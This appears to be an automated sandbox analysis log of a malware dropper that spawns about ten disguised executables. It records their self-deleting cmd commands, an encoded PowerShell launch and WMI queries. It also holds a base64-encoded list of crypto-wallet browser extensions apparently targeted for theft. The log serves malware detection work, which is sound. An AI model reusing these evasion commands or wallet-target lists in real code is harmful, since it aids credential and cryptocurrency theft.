                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\F0geI.exe "C:\Program Files (x86)\Company\NewProduct\F0geI.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe "C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe "C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\real.exe "C:\Program Files (x86)\Company\NewProduct\real.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\safert44.exe "C:\Program Files (x86)\Company\NewProduct\safert44.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\jshainx.exe "C:\Program Files (x86)\Company\NewProduct\jshainx.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\brokerius.exe "C:\Program Files (x86)\Company\NewProduct\brokerius.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\captain09876.exe "C:\Program Files (x86)\Company\NewProduct\captain09876.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe "C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\WW1.exe "C:\Program Files (x86)\Company\NewProduct\WW1.exe" Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1852 --field-trial-handle=1800,i,4002354000526200566,13683174315975428069,131072 /prefetch:8Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1672,i,2200090392483505353,13259448681473421789,131072 /prefetch:8Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4528 --field-trial-handle=1672,i,2200090392483505353,13259448681473421789,131072 /prefetch:8Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8304 --field-trial-handle=1672,i,2200090392483505353,13259448681473421789,131072 /prefetch:8Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7704 --field-trial-handle=1672,i,2200090392483505353,13259448681473421789,131072 /prefetch:8Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7968 --field-trial-handle=1672,i,2200090392483505353,13259448681473421789,131072 /prefetch:8Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4528 --field-trial-handle=1672,i,2200090392483505353,13259448681473421789,131072 /prefetch:8Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1972 --field-trial-handle=1712,i,17276114921128893629,13810006438660092211,131072 /prefetch:8Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1780,i,2243672671988617880,5445177111515229420,131072 /prefetch:8Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1828,i,6770499846379427692,11301094581731792919,131072 /prefetch:8Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1808,i,14561123893253289643,1012939592416384631,131072 /prefetch:8Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1972 --field-trial-handle=1712,i,17276114921128893629,13810006438660092211,131072 /prefetch:8Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1940 --field-trial-handle=1732,i,11424558033472135501,3208527025666120732,131072 /prefetch:8Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1964 --field-trial-handle=1816,i,4998864990956341523,321811726047907557,131072 /prefetch:8Jump to behavior
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im real.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\real.exe" & del C:\PrograData\*.dll & exit
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im brokerius.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\brokerius.exe" & del C:\PrograData\*.dll & exit
                    Source: C:\Program Files (x86)\Company\NewProduct\captain09876.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im WW1.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\WW1.exe" & del C:\PrograData\*.dll & exit
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im real.exe /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess created: unknown unknown
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im brokerius.exe /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;real.exe&quot;)
                    Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;brokerius.exe&quot;)
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeFile created: C:\Users\user\AppData\Local\Temp\$instJump to behavior
                    Source: real.exe, 00000016.00000002.493708112.0000000027A3C000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000002.508944762.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.623534106.0000000026CBC000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.641177713.000000006096F000.00000002.00001000.00020000.00000000.sdmp, WW1.exe, 0000001F.00000002.795827248.0000000027AE9000.00000004.00000800.00020000.00000000.sdmp, WW1.exe, 0000001F.00000002.814063513.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: real.exe, 00000016.00000002.493708112.0000000027A3C000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000002.508944762.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.623534106.0000000026CBC000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.641177713.000000006096F000.00000002.00001000.00020000.00000000.sdmp, WW1.exe, 0000001F.00000002.795827248.0000000027AE9000.00000004.00000800.00020000.00000000.sdmp, WW1.exe, 0000001F.00000002.814063513.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: real.exe, 00000016.00000002.493708112.0000000027A3C000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000002.508944762.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.623534106.0000000026CBC000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.641177713.000000006096F000.00000002.00001000.00020000.00000000.sdmp, WW1.exe, 0000001F.00000002.795827248.0000000027AE9000.00000004.00000800.00020000.00000000.sdmp, WW1.exe, 0000001F.00000002.814063513.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                    Source: real.exe, 00000016.00000002.493708112.0000000027A3C000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000002.508944762.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.623534106.0000000026CBC000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.641177713.000000006096F000.00000002.00001000.00020000.00000000.sdmp, WW1.exe, 0000001F.00000002.795827248.0000000027AE9000.00000004.00000800.00020000.00000000.sdmp, WW1.exe, 0000001F.00000002.814063513.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                    Source: real.exe, 00000016.00000002.493708112.0000000027A3C000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000002.508944762.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.623534106.0000000026CBC000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.641177713.000000006096F000.00000002.00001000.00020000.00000000.sdmp, WW1.exe, 0000001F.00000002.795827248.0000000027AE9000.00000004.00000800.00020000.00000000.sdmp, WW1.exe, 0000001F.00000002.814063513.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: real.exe, 00000016.00000002.493708112.0000000027A3C000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000002.508944762.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.623534106.0000000026CBC000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.641177713.000000006096F000.00000002.00001000.00020000.00000000.sdmp, WW1.exe, 0000001F.00000002.795827248.0000000027AE9000.00000004.00000800.00020000.00000000.sdmp, WW1.exe, 0000001F.00000002.814063513.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: real.exe, 00000016.00000002.493708112.0000000027A3C000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000002.508944762.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.623534106.0000000026CBC000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.641177713.000000006096F000.00000002.00001000.00020000.00000000.sdmp, WW1.exe, 0000001F.00000002.795827248.0000000027AE9000.00000004.00000800.00020000.00000000.sdmp, WW1.exe, 0000001F.00000002.814063513.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: real.exe, 00000016.00000002.493708112.0000000027A3C000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000002.508944762.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.623534106.0000000026CBC000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.641177713.000000006096F000.00000002.00001000.00020000.00000000.sdmp, WW1.exe, 0000001F.00000002.795827248.0000000027AE9000.00000004.00000800.00020000.00000000.sdmp, WW1.exe, 0000001F.00000002.814063513.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: real.exe, 00000016.00000002.493708112.0000000027A3C000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000002.508944762.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.623534106.0000000026CBC000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.641177713.000000006096F000.00000002.00001000.00020000.00000000.sdmp, WW1.exe, 0000001F.00000002.795827248.0000000027AE9000.00000004.00000800.00020000.00000000.sdmp, WW1.exe, 0000001F.00000002.814063513.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: real.exe, 00000016.00000002.493708112.0000000027A3C000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000002.508944762.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.623534106.0000000026CBC000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.641177713.000000006096F000.00000002.00001000.00020000.00000000.sdmp, WW1.exe, 0000001F.00000002.795827248.0000000027AE9000.00000004.00000800.00020000.00000000.sdmp, WW1.exe, 0000001F.00000002.814063513.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: real.exe, 00000016.00000002.493708112.0000000027A3C000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000002.508944762.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.623534106.0000000026CBC000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.641177713.000000006096F000.00000002.00001000.00020000.00000000.sdmp, WW1.exe, 0000001F.00000002.795827248.0000000027AE9000.00000004.00000800.00020000.00000000.sdmp, WW1.exe, 0000001F.00000002.814063513.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: F0geI.exe, 0000000E.00000003.385633618.0000000003DA4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: real.exe, 00000016.00000002.493708112.0000000027A3C000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000002.508944762.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.623534106.0000000026CBC000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.641177713.000000006096F000.00000002.00001000.00020000.00000000.sdmp, WW1.exe, 0000001F.00000002.795827248.0000000027AE9000.00000004.00000800.00020000.00000000.sdmp, WW1.exe, 0000001F.00000002.814063513.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXESection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_0040A1FE CreateToolhelp32Snapshot,Process32First,Process32Next,14_2_0040A1FE
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                    Source: namdoitntn.exe.0.dr, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZj